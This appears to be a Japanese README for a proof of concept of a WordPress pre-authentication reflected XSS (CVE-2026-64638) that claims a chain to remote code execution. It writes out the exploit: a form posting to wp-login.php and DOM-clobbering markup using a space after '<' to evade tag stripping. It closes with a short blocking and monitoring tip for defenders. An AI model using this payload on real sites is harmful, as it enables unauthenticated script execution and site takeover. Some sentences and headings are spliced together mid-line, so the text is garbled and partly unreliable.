
WordPressの認証前リフレクション型XSS(CVE-2026-64638)を実証する単一ファイルHTMLの概念実証(PoC)です。DOMクロバリングとアプリパスワードのアップロードを介して、未認証のJavaScript実行とXSSからRCEへの攻撃チェーンを示します。
WordPress 事前認証リフレクション型XSSの概念実証
WordPress Core の CVE-2026-64638 (XSS2Shell) パーサー差分XSSに対する単一ファイルのHTML概念実証です。細工されたログインリクエストを介して、WordPress オリジン上で認証なしの JavaScript 実行を実証します。
strip_tags() vs wp_kses_post())POC.html を開きます。action 内の http://TARGET/wp-login.php を対象のURLに置き換えます。<form id="poc" method="post" action="http://TARGET/wp-login.php">
confirm()(または alert())ポップアップが表示されます。< area id=ajaxurl href=/?rest_route=/&_method=GET&_jsonp=confirm&_envelope=1>
< div id=color-picker class=reset-pass-submit>
< button class="wp-generate-pw color-option">X
各 < の後のスペースがエクスプロイトです。これがないと、wp_strip_all_tags() がすべてを削除します。
log フィールドの %3C + 空白パターンをブロックします。log にエンコードされた < が含まれる POST /wp-login.php リクエストを監視します。